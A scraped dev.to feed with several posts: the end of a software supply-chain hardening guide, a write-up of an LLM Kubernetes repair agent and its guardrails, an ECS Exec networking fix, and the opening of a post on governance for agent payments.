&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;11. Logger redaction&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;pino &lt;code&gt;redact:&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;structlog&lt;/code&gt; processors + &lt;code&gt;logging.Filter&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Logback &lt;code&gt;MaskingPatternLayout&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;zap&lt;/code&gt; custom encoder; &lt;code&gt;zerolog&lt;/code&gt; &lt;code&gt;.Strs("redacted", ...)&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;tracing&lt;/code&gt; &lt;code&gt;Layer&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Rails.config.filter_parameters&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Serilog &lt;code&gt;Enrichers.Sensitive&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;12. Force-pin transitive&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pnpm.overrides&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;pip &lt;code&gt;constraints.txt&lt;/code&gt;; uv &lt;code&gt;[tool.uv] override-dependencies&lt;/code&gt;; Poetry → promote to direct&lt;/td&gt;
&lt;td&gt;Maven &lt;code&gt;&amp;lt;dependencyManagement&amp;gt;&lt;/code&gt;; Gradle &lt;code&gt;dependencySubstitution&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;replace&lt;/code&gt; directive in &lt;code&gt;go.mod&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;[patch.crates-io]&lt;/code&gt; in &lt;code&gt;Cargo.toml&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Direct &lt;code&gt;gem 'foo', '1.2.3'&lt;/code&gt; in &lt;code&gt;Gemfile&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Directory.Packages.props&lt;/code&gt; central management&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;CI translations for Boundaries 5–9:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;GitHub Actions&lt;/th&gt;
&lt;th&gt;GitLab CI&lt;/th&gt;
&lt;th&gt;Buildkite&lt;/th&gt;
&lt;th&gt;CircleCI&lt;/th&gt;
&lt;th&gt;Jenkins&lt;/th&gt;
&lt;th&gt;AWS CodeBuild&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Mutable-ref pin (B7)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;uses: org/action@&amp;lt;sha&amp;gt;&lt;/code&gt; + &lt;code&gt;pinact&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;include: ref: &amp;lt;sha&amp;gt;&lt;/code&gt; + Renovate &lt;code&gt;gitlabci-include&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Plugin &lt;code&gt;@&amp;lt;sha&amp;gt;&lt;/code&gt; + Renovate &lt;code&gt;buildkite&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Inline orbs; or pin &lt;code&gt;orbs: foo/bar@&amp;lt;exact-version&amp;gt;&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;@Library('foo@&amp;lt;sha&amp;gt;')&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pre-mirrored installers + checksum verify in &lt;code&gt;pre_build&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Default-deny perms (B8)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;permissions: {}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;id_tokens:&lt;/code&gt; per-job; protected variables&lt;/td&gt;
&lt;td&gt;Agent-queue ACLs; secrets via Vault Agent&lt;/td&gt;
&lt;td&gt;Restricted contexts&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;withCredentials&lt;/code&gt; per-step; folder-level isolation&lt;/td&gt;
&lt;td&gt;Per-project IAM role; &lt;code&gt;SECRETS_MANAGER&lt;/code&gt; vars&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;OIDC trust (B8)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;sub&lt;/code&gt;/&lt;code&gt;job_workflow_ref&lt;/code&gt; anchored&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;CI_JOB_JWT_V2&lt;/code&gt; audience-bound&lt;/td&gt;
&lt;td&gt;OIDC plugin since 2023&lt;/td&gt;
&lt;td&gt;&lt;code&gt;circleci/oidc-orb&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Workload identity / &lt;code&gt;manage-credentials-binding-plugin&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;aws sts assume-role-with-web-identity&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Shell injection (B9)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;actionlint&lt;/code&gt; + &lt;code&gt;zizmor&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;glab ci lint&lt;/code&gt;; &lt;code&gt;semgrep p/ci&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;buildkite-pipeline-lint&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;circleci config validate&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pipeline Linter; &lt;code&gt;pipeline-utility-steps&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cfn-lint&lt;/code&gt; + &lt;code&gt;checkov&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Image signing identity (B6)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;OIDC issuer &lt;code&gt;token.actions.githubusercontent.com&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;CI_JOB_JWT_V2&lt;/code&gt; issuer&lt;/td&gt;
&lt;td&gt;Buildkite OIDC issuer&lt;/td&gt;
&lt;td&gt;&lt;code&gt;oidc.circleci.com&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;OIDC via plugin or workload identity&lt;/td&gt;
&lt;td&gt;CodeBuild OIDC tokens&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Cross-cutting tools, alphabetical:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Audit (CVE in deps):&lt;/strong&gt; pnpm/npm &lt;code&gt;audit&lt;/code&gt; → &lt;code&gt;pip-audit&lt;/code&gt; (Python), &lt;code&gt;mvn dependency-check:check&lt;/code&gt; or Gradle &lt;code&gt;dependencyCheckAnalyze&lt;/code&gt; (Java), &lt;code&gt;govulncheck&lt;/code&gt; (Go, symbol-aware reachability), &lt;code&gt;cargo audit&lt;/code&gt; + &lt;code&gt;cargo-deny&lt;/code&gt; (Rust), &lt;code&gt;bundler-audit&lt;/code&gt; (Ruby), &lt;code&gt;dotnet list package --vulnerable --include-transitive&lt;/code&gt; (.NET). Cross-stack: &lt;strong&gt;OSV-Scanner&lt;/strong&gt; (Google; OSV format covers all of the above), Snyk Open Source, Wiz, Socket.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cosign:&lt;/strong&gt; ecosystem-agnostic. Works on any container image and on generic blobs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;gitleaks:&lt;/strong&gt; stack-agnostic. Alternatives: &lt;code&gt;trufflehog&lt;/code&gt;, &lt;code&gt;detect-secrets&lt;/code&gt;, GitHub native push protection. Run several; they catch different things.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CodeQL:&lt;/strong&gt; native multi-language (JS/TS, Python, Java, Kotlin, Go, Ruby, C#, C/C++, Swift). Alternatives: Semgrep Pro (broadest), Snyk Code, SonarCloud, Veracode.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;minimumReleaseAge&lt;/code&gt;:&lt;/strong&gt; native in pnpm. Universal via Renovate (&lt;code&gt;minimumReleaseAge&lt;/code&gt; config) covers npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SBOM:&lt;/strong&gt; &lt;code&gt;syft&lt;/code&gt; is stack-agnostic. Per-stack: &lt;code&gt;cyclonedx-bom&lt;/code&gt; (Python), &lt;code&gt;cyclonedx-maven-plugin&lt;/code&gt; (Java), &lt;code&gt;cyclonedx-gomod&lt;/code&gt; (Go), &lt;code&gt;cargo cyclonedx&lt;/code&gt; (Rust), &lt;code&gt;bundler-cyclonedx&lt;/code&gt; (Ruby), &lt;code&gt;dotnet CycloneDX&lt;/code&gt; (.NET). Consume with &lt;strong&gt;Dependency-Track&lt;/strong&gt;; scan with &lt;strong&gt;Trivy&lt;/strong&gt; or &lt;strong&gt;Grype&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The boundary survives. The YAML changes.&lt;/p&gt;




&lt;h2&gt;
  
  
  Closing
&lt;/h2&gt;

&lt;p&gt;Last week a colleague's PR went red on &lt;code&gt;pinact --check --verify&lt;/code&gt; because they'd added &lt;code&gt;actions/checkout@v6&lt;/code&gt; instead of the SHA. Thirty seconds of annoyance. Without that gate, that line would have been one tag-rewrite away from &lt;code&gt;tj-actions&lt;/code&gt;. Repeat across 110 &lt;code&gt;uses:&lt;/code&gt; lines, 16 workflows, 7 production Dockerfiles, and one &lt;code&gt;_.template&lt;/code&gt; CVE that turned out not to matter and that's the week.&lt;/p&gt;

&lt;p&gt;The supply-chain attacker's leverage is asymmetric: one compromised maintainer, one rewritten tag, one unscanned dependency cascades into thousands of victims. The defender's leverage can be asymmetric too, but only if your controls live at the right boundary. SAST won't catch a malicious GitHub Action. A pen-test won't catch a tag rewrite. A bug bounty isn't going to surface an &lt;code&gt;_.template&lt;/code&gt; CVE buried four levels deep in a transitive dep nobody knew was there.&lt;/p&gt;

&lt;p&gt;The four-line diff at the top of this article wasn't found by SAST. It wasn't found by pen-test. It was found by a grep for &lt;code&gt;${{ github.event&lt;/code&gt; across every workflow in the monorepo, on a Tuesday, by someone who knew that string was the boundary between "code we wrote" and "code an attacker wrote for us."&lt;/p&gt;

&lt;p&gt;That grep took eleven seconds. The fix took four lines. The control that catches the next one was one commit.&lt;/p&gt;

&lt;p&gt;If you only take three things from this: pin every external CI reference (Action / include / plugin / orb / shared-library) to a content-addressed identifier; scope every CI permission block to least privilege; set a &lt;code&gt;minimumReleaseAge&lt;/code&gt; of at least 3 days on your package manager. Put the first two as required status checks on &lt;code&gt;main&lt;/code&gt;. Together they would have stopped &lt;a href="mailto:axios@1.14.1"&gt;axios@1.14.1&lt;/a&gt; cold for any pipeline running them, and tj-actions cold for every repo that ran it. The other nine boundaries are the layers behind that.&lt;/p&gt;

&lt;p&gt;For a regulated workload healthcare staffing means downtime maps to nurses missing shifts at hospitals, so we weight availability higher than most SaaS the calibration looks like: we tolerated +5 minutes of PR latency, but rejected anything that could block a hotfix at 2am. Your domain's calibration will differ. Write down why.&lt;/p&gt;

&lt;p&gt;If you've calibrated &lt;code&gt;minimumReleaseAge&lt;/code&gt; differently, I want to hear the number and why especially if you're in fintech or healthcare with stricter patch SLAs. Tell me I'm wrong about any of the trade-offs in the comments. I'd rather argue about the number here than discover the right answer at 2am during a credential-rotation drill because some maintainer's npm token leaked at lunch.&lt;/p&gt;




&lt;h2&gt;
  
  
  Appendix: minimal viable starter pack
&lt;/h2&gt;

&lt;p&gt;A team that has none of these in place can ship a meaningful subset in roughly a week, regardless of stack:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Lock manifests committed; CI install command refuses to mutate them.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;minimumReleaseAge&lt;/code&gt; (pnpm) or Renovate equivalent set to ≥ 3 days.&lt;/li&gt;
&lt;li&gt;Lifecycle-script default-deny: &lt;code&gt;pnpm.onlyBuiltDependencies&lt;/code&gt; allowlist + &lt;code&gt;--ignore-scripts&lt;/code&gt; in CI; equivalent gate per stack.&lt;/li&gt;
&lt;li&gt;Base images pinned by &lt;code&gt;@sha256:&lt;/code&gt; digest. Non-root &lt;code&gt;USER&lt;/code&gt; in every production image.&lt;/li&gt;
&lt;li&gt;Workflow / pipeline default-deny on permissions; per-job grants.&lt;/li&gt;
&lt;li&gt;Mutable references (&lt;code&gt;uses:&lt;/code&gt;, &lt;code&gt;include:&lt;/code&gt;, plugins, orbs, shared libs) pinned to commit SHAs; CI gate fails un-pinned PRs.&lt;/li&gt;
&lt;li&gt;Untrusted CI input passed via env vars, never interpolated into shell.&lt;/li&gt;
&lt;li&gt;Image signing via cosign + Sigstore (or stack-equivalent provenance).&lt;/li&gt;
&lt;li&gt;PR-time secret scanning (gitleaks / trufflehog).&lt;/li&gt;
&lt;li&gt;PR-time dependency CVE gate (&lt;code&gt;pnpm audit&lt;/code&gt; + per-stack equivalents above) with documented expiry-forced allowlist.&lt;/li&gt;
&lt;li&gt;Logger redaction at framework level for auth headers, cookies, password / token / secret keys.&lt;/li&gt;
&lt;li&gt;CODEOWNERS covering every file in this list.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each item is a few lines of configuration. Total cost is roughly the week described above for a multiple projects monorepo; smaller repos proportionally less. The benefit, in our case, was being able to stop checking my phone on Sundays.&lt;/p&gt;

</description>
      <category>security</category>
      <category>devsecops</category>
      <category>githubactions</category>
      <category>supplychain</category>
    </item>
    <item>
      <title>How I Built an Autonomous SRE (and made it into the OpenAI Cookbook!)</title>
      <dc:creator>Zaynul Abedin Miah</dc:creator>
      <pubDate>Fri, 08 May 2026 11:46:40 +0000</pubDate>
      <link>https://dev.to/aws-builders/how-i-built-an-autonomous-sre-and-made-it-into-the-openai-cookbook-1pn2</link>
      <guid>https://dev.to/aws-builders/how-i-built-an-autonomous-sre-and-made-it-into-the-openai-cookbook-1pn2</guid>
      <description>&lt;h1&gt;
  
  
  Taming GPT-4o for Production EKS
&lt;/h1&gt;

&lt;p&gt;Let’s be brutally honest for a second: the idea of letting an LLM blindly run &lt;code&gt;kubectl apply&lt;/code&gt; on your production AWS EKS cluster is terrifying.&lt;/p&gt;

&lt;p&gt;It is the stuff of late-night DevOps nightmares. One rogue hallucination, an accidental namespace change, or a sudden &lt;code&gt;ClusterRoleBinding&lt;/code&gt; injection, and your entire infrastructure could be compromised.&lt;/p&gt;

&lt;p&gt;As an AWS Community Builder and AWS Student Builder Group Leader managing developer ecosystems in the Global South, I see developers rushing to integrate GenAI into their pipelines every day. But zero-shot LLM generation for live infrastructure isn't just risky it's mathematically unsafe.&lt;/p&gt;

&lt;p&gt;I call this the &lt;strong&gt;"Infrastructure Hallucination"&lt;/strong&gt; problem.&lt;/p&gt;

&lt;p&gt;To solve this, I built &lt;strong&gt;Kube-AutoFix&lt;/strong&gt;: an autonomous Kubernetes debugging agent that acts as a Staff-Level SRE. It doesn’t just guess; it deploys, monitors, debugs, and mathematically validates its fixes. The architecture proved so resilient that it successfully passed a grueling security review by the OpenAI Codex bot and was officially merged into the &lt;strong&gt;&lt;a href="https://github.com/openai/openai-cookbook/pull/2659" rel="noopener noreferrer"&gt;OpenAI Cookbook&lt;/a&gt;&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Here is exactly how I built it, and the guardrails you need to start building safe agentic workflows. &lt;/p&gt;




&lt;h2&gt;
  
  
  The 'Infrastructure Hallucination' Problem
&lt;/h2&gt;

&lt;p&gt;When standard LLMs attempt Infrastructure as Code (IaC), they fail gracefully, which is the most dangerous kind of failure.&lt;/p&gt;

&lt;p&gt;They will confidently generate YAML that &lt;em&gt;looks&lt;/em&gt; perfect but contains fatal flaws:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Syntax Hallucinations:&lt;/strong&gt; Adding random markdown fences (yaml) inside the execution pipeline.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Scope Creep:&lt;/strong&gt; Deciding your deployment needs a new &lt;code&gt;ServiceAccount&lt;/code&gt; with elevated privileges just because it saw a similar pattern in its training data.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Destructive State Changes:&lt;/strong&gt; Modifying core invariants like the &lt;code&gt;Namespace&lt;/code&gt; or overriding &lt;code&gt;Replica&lt;/code&gt; counts during a hotfix.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You cannot pipe probabilistic text generation directly into a deterministic system like AWS EKS without a strict translation layer.&lt;/p&gt;




&lt;h2&gt;
  
  
  Enter Kube-AutoFix &amp;amp; Structured Outputs
&lt;/h2&gt;

&lt;p&gt;To bridge this gap, I designed a closed-loop Agentic Workflow: &lt;strong&gt;Deploy ➡️ Monitor ➡️ Debug ➡️ Fix.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Tech Stack:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Python 3.11&lt;/strong&gt; (The glue)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kubernetes Python Client&lt;/strong&gt; (For raw cluster interaction)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AWS EKS&lt;/strong&gt; (Amazon Elastic Kubernetes Service for testing)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenAI SDK (GPT-4o)&lt;/strong&gt; (The reasoning engine)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pydantic&lt;/strong&gt; (The ultimate gatekeeper)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The secret sauce here is &lt;strong&gt;OpenAI’s Structured Outputs&lt;/strong&gt;. By wrapping our expected YAML fix in a Pydantic schema, we force GPT-4o to adhere to a strict JSON schema at the API level. It stops acting like a creative writer and starts acting like a deterministic function.&lt;/p&gt;

&lt;p&gt;But even Structured Outputs aren't enough for a production cluster. We need guardrails.&lt;/p&gt;




&lt;h2&gt;
  
  
  Building the Ultimate Guardrails (Surviving the OpenAI Code Review)
&lt;/h2&gt;

&lt;p&gt;Getting a PR merged into the official OpenAI Cookbook is no walk in the park. The automated Staff-Level CI/CD review by the OpenAI Codex bot is unforgiving when it comes to system security.&lt;/p&gt;

&lt;p&gt;To pass the review, I had to architect three massive guardrails into Kube-AutoFix:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Mathematical YAML Validation
&lt;/h3&gt;

&lt;p&gt;LLMs love to wrap code in markdown (yaml). If you pass that to &lt;code&gt;kubectl&lt;/code&gt;, it crashes. Kube-AutoFix intercepts the LLM's response, strips any hallucinated markdown formatting using regex, and strictly parses the string through &lt;code&gt;yaml.safe_load_all()&lt;/code&gt;. If it isn't mathematically valid YAML, it never touches the cluster.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Deny-by-Default Architecture
&lt;/h3&gt;

&lt;p&gt;Kube-AutoFix operates on a strict "Zero Trust" model. Before applying a fix, the agent parses the &lt;code&gt;kind&lt;/code&gt; of Kubernetes resource the LLM is trying to deploy. If the LLM tries to sneak in a &lt;code&gt;Role&lt;/code&gt;, &lt;code&gt;ClusterRoleBinding&lt;/code&gt;, or &lt;code&gt;DaemonSet&lt;/code&gt; when it was only authorized to fix a &lt;code&gt;Deployment&lt;/code&gt;, the agent immediately rejects the payload.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Strict Structural Invariants
&lt;/h3&gt;

&lt;p&gt;This was the final boss of the security review. How do you ensure the LLM fixes a crashing pod without altering the architecture? You lock the state. Kube-AutoFix extracts the original &lt;code&gt;Namespace&lt;/code&gt;, &lt;code&gt;Replica&lt;/code&gt; count, &lt;code&gt;Deployment Name&lt;/code&gt;, and &lt;code&gt;Container Ports&lt;/code&gt; from the failing cluster state and forces them onto the LLM's generated YAML. Even if GPT-4o hallucinates a scale-up to 50 replicas, Kube-AutoFix overrides it back to the original count before execution.&lt;/p&gt;




&lt;h2&gt;
  
  
  ☁️ Why This Matters for AWS Builders
&lt;/h2&gt;

&lt;p&gt;As an AWS Community Builder, I look at this pattern and see the future of cloud engineering.&lt;/p&gt;

&lt;p&gt;The concepts driving Kube-AutoFix aren't limited to EKS and Kubernetes. This exact closed-loop, deterministic agentic pattern can (and should) be applied across the AWS ecosystem:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Amazon Bedrock:&lt;/strong&gt; Wrapping your custom Foundation Models in Pydantic to generate safe, deployable &lt;strong&gt;AWS CloudFormation&lt;/strong&gt; templates.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AWS CDK:&lt;/strong&gt; Using agents to debug failing CDK synthesizer states and propose structurally validated TypeScript fixes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automated Incident Response:&lt;/strong&gt; Hooking an agentic workflow into Amazon CloudWatch alarms to autonomously remediate CPU throttling without human intervention.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We are moving away from "AI that writes code" to "AI that safely operates infrastructure."&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Seeing &lt;strong&gt;&lt;a href="https://github.com/openai/openai-cookbook/pull/2659" rel="noopener noreferrer"&gt;Kube-AutoFix PR reviewed into the OpenAI Cookbook&lt;/a&gt;&lt;/strong&gt; was a massive milestone. It proves that with the right guardrails, we can trust AI with the keys to our infrastructure without losing sleep.&lt;/p&gt;

&lt;p&gt;If you are a DevOps fanatic, or just curious about Agentic AI, I'd love for you to dig into the code!&lt;/p&gt;

&lt;p&gt;🔗 &lt;strong&gt;Check out the source code here:&lt;/strong&gt; &lt;a href="https://github.com/azaynul10/kube-autofix" rel="noopener noreferrer"&gt;Kube-AutoFix on GitHub&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Let’s discuss in the comments:&lt;/strong&gt; How are you currently integrating AI into your CI/CD or infrastructure pipelines? Are you using agents, or sticking strictly to code-generation assistants? Let me know! 👇&lt;/p&gt;

</description>
      <category>aws</category>
      <category>devops</category>
      <category>kubernetes</category>
      <category>openai</category>
    </item>
    <item>
      <title>Why ECS Exec Fails on ECS Managed Instance and How to Fix It</title>
      <dc:creator>Kosuke Ozawa</dc:creator>
      <pubDate>Fri, 08 May 2026 05:19:16 +0000</pubDate>
      <link>https://dev.to/aws-builders/why-ecs-exec-fails-on-ecs-managed-instance-and-how-to-fix-it-3khg</link>
      <guid>https://dev.to/aws-builders/why-ecs-exec-fails-on-ecs-managed-instance-and-how-to-fix-it-3khg</guid>
      <description>&lt;p&gt;I hit an issue while testing ECS Managed Instance, so here's a quick note for future reference.&lt;/p&gt;

&lt;h2&gt;
  
  
  ECS Exec Fails on a Task Container Running on ECS Managed Instance in a Public Subnet
&lt;/h2&gt;

&lt;p&gt;If you deploy this setup in a public subnet without any special network configuration and run the Exec command, you'll get the following error:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;An error occurred &lt;span class="o"&gt;(&lt;/span&gt;TargetNotConnectedException&lt;span class="o"&gt;)&lt;/span&gt; when calling the ExecuteCommand operation: The execute &lt;span class="nb"&gt;command &lt;/span&gt;failed. TargetNotConnected: ecs:ecs-task_xxxxxxxxxxxxxxxx is not connected.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Network Considerations for ECS Managed Instance
&lt;/h2&gt;

&lt;p&gt;The blog post linked below covers this in detail, but it appears that with ECS Managed Instance, you cannot assign a public IP to a task using &lt;code&gt;assignPublicIp=ENABLE&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://zenn.dev/gsk9999/articles/0da047d2cc3b59" rel="noopener noreferrer"&gt;https://zenn.dev/gsk9999/articles/0da047d2cc3b59&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  When Task Instances Are Placed in a Public Subnet
&lt;/h2&gt;

&lt;p&gt;Here is what you can do:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Create a VPC Endpoint&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5rh3kwmzenvmbb2fiba8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5rh3kwmzenvmbb2fiba8.png" alt="Connect to Session Manager via VPC Endpoint" width="800" height="333"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I confirmed this works with my own testing. However, for production use, the &lt;strong&gt;per-hour cost of VPC Endpoints&lt;/strong&gt; is something to keep in mind.&lt;/p&gt;

&lt;h2&gt;
  
  
  When Task Instances Are Placed in a Private Subnet
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;The method above&lt;/li&gt;
&lt;li&gt;Or route traffic to the internet via NAT Gateway&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmc30svdu3dgrwxazl3ku.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmc30svdu3dgrwxazl3ku.png" alt="Connect to Session Manager via NAT Gateway" width="800" height="301"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I haven't tested this myself, but since the route is established at the network level in this case, it should work in theory.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;When using ECS Managed Instance, it's important to pay attention to networking.&lt;/p&gt;

&lt;p&gt;This article doesn't go into detail on this, but the examples above assume &lt;code&gt;awsvpc&lt;/code&gt; mode. Depending on your use case, switching the ECS network mode to &lt;code&gt;bridge&lt;/code&gt; may also be an option.&lt;/p&gt;

&lt;p&gt;For production environments where NAT Gateway or VPC Endpoints are already in place, going with the approach described in the linked blog post is probably the better choice. Note that the linked blog post is written in Japanese.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>containers</category>
      <category>cloud</category>
      <category>networking</category>
    </item>
    <item>
      <title>Agents that pay: why agent payments without governance is the next incident</title>
      <dc:creator>Alexey Vidanov</dc:creator>
      <pubDate>Fri, 08 May 2026 04:40:14 +0000</pubDate>
      <link>https://dev.to/aws-builders/agents-that-pay-why-agent-payments-without-governance-is-the-next-incident-2gc1</link>
      <guid>https://dev.to/aws-builders/agents-that-pay-why-agent-payments-without-governance-is-the-next-incident-2gc1</guid>
      <description>&lt;p&gt;The preview supports &lt;a href="https://docs.cdp.coinbase.com/" rel="noopener noreferrer"&gt;Coinbase CDP wallets&lt;/a&gt; and &lt;a href="https://privy.io/" rel="noopener noreferrer"&gt;Stripe Privy wallets&lt;/a&gt; as payment connections, using the &lt;a href="https://www.x402.org/" rel="noopener noreferrer"&gt;x402 protocol&lt;/a&gt; for HTTP-native stablecoin micropayments. Available in US East (N. Virginia), US West (Oregon), Europe (Frankfurt), and Asia Pacific (Sydney). &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi7opkq8bykpkzmdgmbgh.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi7opkq8bykpkzmdgmbgh.jpg" alt=" " width="800" height="519"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;End users fund wallets through stablecoin or fiat via debit card, and must explicitly authorize agent wallet access before the agent can transact at all. &lt;/p&gt;

&lt;p&gt;That's initial authorization, not per-action governance. The agent still decides what to do with that access at runtime.&lt;/p&gt;

&lt;p&gt;That's the plumbing. It works. Here's what it doesn't cover.&lt;/p&gt;

&lt;h2&gt;
  
  
  Four gaps in agent payment governance
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Gap 1: When is the agent allowed to pay?
&lt;/h3&gt;

